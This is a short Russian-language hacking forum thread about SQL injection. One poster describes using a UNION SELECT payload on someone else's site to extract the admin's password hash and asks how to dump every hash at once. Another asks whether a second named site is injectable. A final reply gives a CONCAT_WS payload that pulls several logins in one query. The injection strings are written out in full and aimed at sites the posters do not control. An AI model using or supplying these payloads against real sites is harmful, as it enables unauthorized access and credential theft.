Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
SQL Injection, Помогите, плиzzz!
 
История такая: нашел сайт с бажным скриптом, который обращается к БД и выводит топик:
http://www.site.com/topic.php?ID=44
После подстановки кавычки получил ошибку, затем успешно провел UNION:
http://www.site.com/topic.php?ID=44+UNION+SELECT+0,0,0,0,password,0+FROM+users+LIMIT+1,1/*
Получил хеш админа. Вопрос вот в чем: как бы мне сразу все хеши из таблицы получить?
 
как..ручками, конечно
Ну или ты можешь написать скрипт на perl или php, который автоматизирует твою работу. Тут уже дело вкуса :)
 
Ясно...значит только ручками...ну ладно, все равно спасибо за ответ =)
 
Чувак, админ эту дыру уже давно закрыл. Так что не парся...
 
Все хеши это записи БД как ты хочешь все сразу то за один запрос (ведь в оригинале там к одному полю запрос)
 
допустим есть сайт при добавлении кавычки к передаваемой переменной
www.site.com/content.php?z=1'

выдает следующее
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''vshub.ultranet.ru/content.php?z=1'', 1, 0)' at line 1

есть ли возможность скуль инекции
 
вероятно, что можно....
 
Недавно нашел в статье 1dt.w0lf'а как можно это сделать:
CONCAT_WS("|",(select login from users LIMIT 0,1),(select login from users LIMIT 1,1),(select login from users LIMIT 2,1))
Первый параметр это разделитель, а остальное и так ясно...
Страницы: 1
Читают тему